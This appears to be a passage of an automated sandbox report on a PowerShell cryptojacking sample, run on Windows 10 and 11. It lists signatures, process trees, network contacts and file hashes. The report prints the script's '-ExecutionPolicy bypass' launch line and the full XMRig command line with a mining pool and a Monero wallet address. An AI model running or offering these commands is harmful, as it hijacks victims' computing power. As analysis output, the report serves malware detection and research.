N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3392-0-0x00007FFC5CB83000-0x00007FFC5CB85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v52usm3x.xev.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3392-9-0x00000230EDB50000-0x00000230EDB72000-memory.dmp

memory/3392-10-0x00007FFC5CB80000-0x00007FFC5D642000-memory.dmp

memory/3392-11-0x00007FFC5CB80000-0x00007FFC5D642000-memory.dmp

memory/3392-12-0x00007FFC5CB80000-0x00007FFC5D642000-memory.dmp

memory/3392-14-0x00000230EDC10000-0x00000230EDC22000-memory.dmp

memory/3392-15-0x00000230EDBE0000-0x00000230EDBEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2732-46-0x000001F370E40000-0x000001F370E60000-memory.dmp

memory/2732-47-0x000001F370F90000-0x000001F370FB0000-memory.dmp

memory/2732-48-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-50-0x000001F370FB0000-0x000001F370FD0000-memory.dmp

memory/3392-51-0x00007FFC5CB83000-0x00007FFC5CB85000-memory.dmp

memory/3392-49-0x00007FFC5CB80000-0x00007FFC5D642000-memory.dmp

memory/2732-52-0x000001F370FD0000-0x000001F370FF0000-memory.dmp

memory/2732-53-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-54-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-55-0x000001F370FB0000-0x000001F370FD0000-memory.dmp

memory/2732-57-0x000001F370FD0000-0x000001F370FF0000-memory.dmp

memory/2732-56-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-58-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-59-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-60-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-61-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-62-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-63-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-64-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-65-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-66-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-67-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-68-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-69-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-70-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-71-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-72-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-73-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-74-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-75-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-76-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-77-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-78-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-79-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-80-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-81-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-82-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-83-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-84-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-85-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-86-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-87-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-88-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-89-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-90-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-91-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-92-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-93-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-94-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-95-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-96-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-97-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-98-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-99-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-100-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-101-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-102-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-103-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-104-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-105-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-106-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-107-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-108-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-109-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-110-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-111-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-112-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-113-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-114-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-115-0x00007FF744740000-0x00007FF745373000-memory.dmp

memory/2732-116-0x00007FF744740000-0x00007FF745373000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:49

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp

Files

memory/3112-0-0x00007FFE314C3000-0x00007FFE314C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eah22axt.qii.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3112-10-0x0000020B72B40000-0x0000020B72B62000-memory.dmp

memory/3112-11-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp

memory/3112-12-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp

memory/3112-14-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp

memory/3112-15-0x0000020B730E0000-0x0000020B730F2000-memory.dmp

memory/3112-16-0x0000020B72B20000-0x0000020B72B2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2476-47-0x000001EA32980000-0x000001EA329A0000-memory.dmp

memory/2476-48-0x000001EA34180000-0x000001EA341A0000-memory.dmp

memory/2476-49-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-51-0x000001EA341C0000-0x000001EA341E0000-memory.dmp

memory/2476-50-0x000001EA341A0000-0x000001EA341C0000-memory.dmp

memory/2476-52-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/3112-53-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp

memory/3112-54-0x00007FFE314C3000-0x00007FFE314C5000-memory.dmp

memory/3112-55-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp

memory/2476-56-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/3112-57-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp

memory/2476-58-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-60-0x000001EA341C0000-0x000001EA341E0000-memory.dmp

memory/2476-59-0x000001EA341A0000-0x000001EA341C0000-memory.dmp

memory/2476-61-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-62-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-63-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-64-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-65-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-66-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-67-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-68-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-69-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-70-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-71-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-72-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-73-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-74-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-75-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-76-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-77-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-78-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-79-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-80-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-81-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-82-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-83-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-84-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-85-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-86-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-87-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-88-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-89-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-90-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-91-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-92-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-93-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-94-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-95-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-96-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-97-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-98-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-99-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-100-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-101-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-102-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-103-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-104-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-105-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-106-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-107-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-108-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-109-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-110-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-111-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-112-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-113-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-114-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-115-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-116-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-117-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-118-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

memory/2476-119-0x00007FF64B2C0000-0x00007FF64BEF3000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:49

Platform

win11-20240426-en

Max time kernel

1791s

Max time network

1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1620-0-0x00007FFCF01B3000-0x00007FFCF01B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vxllptyy.w1n.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1620-9-0x0000021FF87E0000-0x0000021FF8802000-memory.dmp

memory/1620-10-0x00007FFCF01B0000-0x00007FFCF0C72000-memory.dmp

memory/1620-11-0x00007FFCF01B0000-0x00007FFCF0C72000-memory.dmp

memory/1620-12-0x00007FFCF01B0000-0x00007FFCF0C72000-memory.dmp

memory/1620-15-0x0000021FF9050000-0x0000021FF905A000-memory.dmp

memory/1620-14-0x0000021FF9060000-0x0000021FF9072000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1040-46-0x000001E8FB160000-0x000001E8FB180000-memory.dmp

memory/1040-47-0x000001E98EFE0000-0x000001E98F000000-memory.dmp

memory/1040-48-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1620-49-0x00007FFCF01B3000-0x00007FFCF01B5000-memory.dmp

memory/1620-50-0x00007FFCF01B0000-0x00007FFCF0C72000-memory.dmp

memory/1040-51-0x000001E98F420000-0x000001E98F440000-memory.dmp

memory/1040-52-0x000001E98F650000-0x000001E98F670000-memory.dmp

memory/1040-53-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-54-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-56-0x000001E98F420000-0x000001E98F440000-memory.dmp

memory/1040-55-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-57-0x000001E98F650000-0x000001E98F670000-memory.dmp

memory/1040-58-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-59-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-60-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-61-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-62-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-63-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-64-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-65-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-66-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-67-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-68-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

